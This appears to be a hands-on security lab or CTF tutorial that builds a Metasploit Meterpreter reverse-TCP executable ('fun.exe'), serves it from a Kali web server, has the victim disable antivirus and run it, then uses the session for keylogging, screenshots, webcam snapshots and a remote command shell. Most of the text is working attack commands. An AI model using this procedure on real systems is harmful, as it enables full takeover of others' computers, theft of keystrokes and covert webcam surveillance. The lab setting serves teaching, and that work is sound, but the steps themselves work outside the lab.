A user who runs that file surrenders control of their computer.
ifconfig
Find your IP address and make a note of it.
In the example below, it is 172.16.1.203.
msfvenom -h
A help message appears,
as shown below.
In Kali, execute these commands to create a malicious Windows executable file named "fun.exe" and serve it from a malicious Web server.
Adjust the IP address to match the IP address of your Kali machine (the C&C server).
msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.1.203 -f exe > /var/www/html/fun.exe
service apache2 start
The operation proceeds without errors,
as shown below.
msfconsole
Metasploit launches,
as shown below.
In Kali, at the msf> prompt, execute this command.
help
Several pages of help scroll by.
The section we'll use is
"Module commands",
as shown below.
use multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 0.0.0.0
exploit
Metasploit starts a
"reverse TCP handler",
as shown below.
http://172.16.1.203/fun.exe
The file "fun.exe" downloads. Bypass any
warning boxes, double-click the file,
and allow it to run.
Note: if you are using antivirus, you will need to disable it. You will also need to disable Windows Defender. If you have problems disabling your malware protection, use the Windows 2008 Server virtual machine, which has no malware protection.
On your Kali machine, a meterpeter session opens, as shown below.
help
Several pages of help scroll by.
Several interesting commands
as shown below.
To become more persistent, we'll migrate to a process that will last longer.
To see a list of processes, at the meterpreter > prompt, execute this command:
ps
Let's migrate to the winlogon process.
At the meterpreter > prompt, execute this command:
migrate -N explorer.exe
Migration is unreliable. It may succeed,
but it may time out. If it times out,
take these steps, as shown below:
exit
exploit
migrate -N explorer.exe
If you can't get it to work after a few tries, skip it and proceed to the next section.
screenshot
Gives you an image of the target's desktop keyscan_start
Begins capturing keys typed in the target. On the Windows target, open Notepad and type in some text, such as your name. keyscan_dump
Shows the keystrokes captured so far webcam_list
Shows the available webcams (if any) webcam_snap
Takes a photo with the webcam shell
Gives you a Windows Command Prompt on the target exit
Leaves the Windows Command Prompt
netstat
A list of network connections appears,
including one to a remote port of 4444,
as highlighted in the image below.
Notice the "PID/Program name" value for this connection, which is redacted in the image below.
Updated 5-23-18 to run as a CTF